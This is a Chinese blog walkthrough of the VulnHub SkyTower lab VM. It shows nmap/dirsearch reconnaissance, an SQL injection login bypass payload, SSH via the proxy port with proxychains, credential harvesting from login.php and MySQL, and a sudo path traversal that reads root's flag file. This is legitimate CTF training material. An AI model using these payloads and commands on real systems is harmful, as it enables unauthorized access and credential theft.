SkyTower

最新推荐文章于 2024-09-02 16:32:30 发布
最新推荐文章于 2024-09-02 16:32:30 发布
阅读量159 收藏 2
点赞数 8
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140834265
版权

一、信息收集

1、主机发现

nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:54:4A:37'

2、端口扫描

nmap 192.168.7.61 -p- -sV

3、目录扫描

dirsearch -u "http://192.168.7.61"

二、GetShell

步骤一:访问80端口,发现登录框,测试SQL注入

步骤二:email输入a' || 1=1 #,密码随便,回显出john用户及密码

步骤三:开放22端口,尝试ssh连接,发现连接不上

步骤四:还开放一个3128端口,可能是ssh代理端口,尝试挂代理连接

vim /etc/proxychains4.conf
proxychains ssh john@192.168.7.61 -t "/bin/bash"

三、提权

步骤一:输入sudo -l,发现不能进行提权

步骤二:login.php存在sql注入,查看下login.php文件,发现数据库的账号和密码,连接

cat /var/www/login.php
mysql -u root -p		#连接数据库

步骤三:查看数据库信息

show database;			#查看数据库信息
use SkyTech;				#切换用户
show tables;				#查看SkyTech数据库下的表
select * from login	#查看表下数据

步骤四:ssh 连接 sara 用户

proxychains ssh sara@192.168.7.61 -t "/bin/sh"

步骤五:再次使用 sudo -l 查看权限

步骤六:利用accounts/的权限,查看root下的文件,发现root用户的密码为theskytower

sudo ls /accounts/../root

sudo cat /accounts/../root/flag.txt

步骤七:使用 ssh 连接 root 用户,提权成功

proxychains ssh root@192.168.7.61 -t "/bin/sh"

花椒椒椒
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vuluhub-skytower-1渗透靶场SkyTower 1
ccccai22的博客
08-04 243
vuluhub-skytower-1渗透靶场SkyTower 1提权
Skytower
weixin_53626662的博客
08-01 235
3.但是22端口被过滤了,所以需要代理,进行端口转发,输入语句下载代理工具。7.切换root用户,并输入刚刚爆出的密码,提权成功。4.使用sara 在连接ssh时执行反弹语句。4.执行反弹语句,直接在ssh连接时执行。5.监听成功后查看文件,有flag文件。3.将密码保存,使用九头蛇爆破。2.到首页抓包改包放包得到。1.首页有sql注入漏洞。6.查看文件,发现密码。文件下载在/etc下。
vulnhub靶场SkyTower靶场
zzzzzzkeai的博客
12-08 559
vulnhub靶场--SkyTower靶场
SkyTower靶机
m0_61995767的博客
07-30 1056
KeyTower打靶记录
vulnhub SkyTower: 1
箭雨镜屋
12-21 3021
本文思路: nmap扫描端口---->万能密码登录web,拿到john的ssh密码----->通过代理连接ssh,得到john的shell---->linpeas.sh扫描发现mysql---->通过mysql得到其他用户ssh账户密码---->用sara用户登录并通过sudo命令提权(找到root的密码)
vulnhub-SKYTOWER: 1靶场夺旗之战
shulao2010的博客
06-11 259
成功登录成功,但是好像没进系统,用我满级英语水平翻译了一下,大概是,你已经被公司停职了,没啥用了,给你2美元*7=14块人民币,玩去吧,但是你想得到这2块钱,还得ssh登录,要不2块钱都拿不到。ssh进行连接时,超时,仔细一看nmap扫描结果,大爷的,是过滤状态,说明端口没有明确信息表明是开启还是关闭,但是没有关闭,说明有戏,但是无法访问。此时只剩下3128端口,这个是一个代理服务,那么很有可能,22端口,需要经3128服务代理之后才能访问。那咋整,蚊子也是肉,我们直接利用用户名密码尝试ssh登录。
skytower靶机
weixin_74232792的博客
07-31 288
用同样的方式列举root目录下的文件 sudo /bin/ls /accounts/../../../root/,发现有个flag文件,查看一下,有root用户的密码,直接切换root,成功提权。发现在accounts目录下有root权限,用以下命令查看shadow文件,cat /accounts/../etc/shadow。转换其他思路,想到刚才扫到了一个代理端口,并且开放了ssh,尝试用这个账号密码连接一下。切换从数据库中发现的其他用户,Sara用户是可以ssh连接的,另外一个不行。
SkyTower 靶机
weixin_62162207的博客
07-30 213
SkyTower 靶机
Skytower靶机
2401_84564260的博客
07-31 419
在john用户处输入sudo -l查看可提权的命令,发现没有。
小白的靶机VulnHub-SkyTower
wo41ge的博客
12-28 448
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 开机界面 就是个这 同样是使用桥接 找到了此次CTF目标计算机IP地址:192.168.56.101 开放了22(filtered)、80、3128代理端口…盒子都有代理… 先访问网页试试 这边 直接 进行测试 发现 是可以sql注入的 得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录 发现 是不可以的 但是根据nmap扫出的结果 它是开了代
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3143
每台都做一做,然后记录在博客里.供自己和大家一起学习.
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 1517
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
NTFS安全权限和文件共享
m0_64139836的博客
08-28 434
FAT32和exFAT支持单个文件不超过4G的文件;
【网络安全】服务基础第一阶段——第五节:Windows系统管理基础---- DHCP部署与安全
goldfish8848的博客
08-29 916
DHCP服务器不仅可以⾃动分配IP地址给⽹络中的设备,还可以进⾏⾼级的管理和配置,以确保⽹络的⾼效运⾏和安全。下⾯是⼀些关键的管理策略和操作步骤:1. 设置地址池(Scope Configuration)DHCP服务器通过所谓的“作⽤域”来管理IP地址池。每个作⽤域定义了⼀系列的IP地址,这些地址可以⾃动分配给⽹络中的客户端。
【软件逆向】第27课,软件逆向安全工程师之(二)寄存器寻址,每天5分钟学习逆向吧!
最新发布
DvlpNews
09-02 421
寄存器寻址是汇编语言中的一种寻址方式,在这种方式中,操作数位于CPU的寄存器中。寄存器是CPU内部的高速存储位置,用于快速访问数据。
医院建筑的电气设计——保障医疗质量与安全的坚固基石
acrel002的博客
08-28 556
特别是那些与患者生命息息相关的1、2类场所,如急诊抢救室、手术室、重症监护室等,其供电系统更是被赋予了“特别重要负荷”的标签,要求在极短的时间内恢复供电,以确保医疗活动的连续性和患者的安全。随着一批批新建医院及既有医院的华丽蜕变,从社区医院到综合医院,再到医疗城、医疗集聚区的崛起,不仅彰显了政府对民生健康的深切关怀,也预示着我国医疗体系正迈向智能化、高效化的新时代。医院,作为生命与健康的守护者,其内部布满了各式各样的精密医疗设备与电子仪器,这些设备的稳定运行高度依赖于稳定、可靠的电力供应。
网络安全售前入门07安全服务——主机漏洞扫描服务方案
打工人
08-30 682
漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。
【网络安全】服务基础第一阶段——第六节:Windows系统管理基础---- DNS部署与安全
goldfish8848的博客
08-29 983
简单来说,⼀条域名的DNS记录会在本地有两种缓存:浏览器缓存和操作系统(OS)缓存。在浏览器中访问的时候,会优先访问浏览器缓存,如果未命中则访问OS缓存,最后再访问DNS服务器(⼀般是ISP提供),然后DNS服务器会递归式的查找域名记录,然后返回。DNS记录会有⼀个ttl值(time to live),单位是秒,意思是这个记录最⼤有效期是多少。经过实验,OS缓存会参考ttl值,但是不完全等于ttl值,⽽浏览器DNS缓存的时间跟ttl值⽆关,每种浏览器都使⽤⼀个固定值。
突发性网络攻击的安全挑战分析
persist213的博客
08-28 589
根据学者的统计,美国主要媒体对突发性网络攻击 ( 尤其是“网络珍珠港”) 的报道于 2011-继 2010 年遭受震网病毒攻击之后,伊朗在 2018 年又一次受到了震网病毒的攻击,并且攻击的严。2013 年之间呈飙升的趋势,而这正是因为伊朗对美国和其波斯湾盟国进行了一系列的网络攻击,正是鉴于这样一种权衡,美国的安全战略才不断地强调对突发性网络攻击的预防。网络战争的新兴形式,对于世界来说仍是国家安全领域的新问题,对网络安全治理带来了不可忽视。根据目前的世界格局,国与国之间的军事实力是完全不对称的,尤其。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值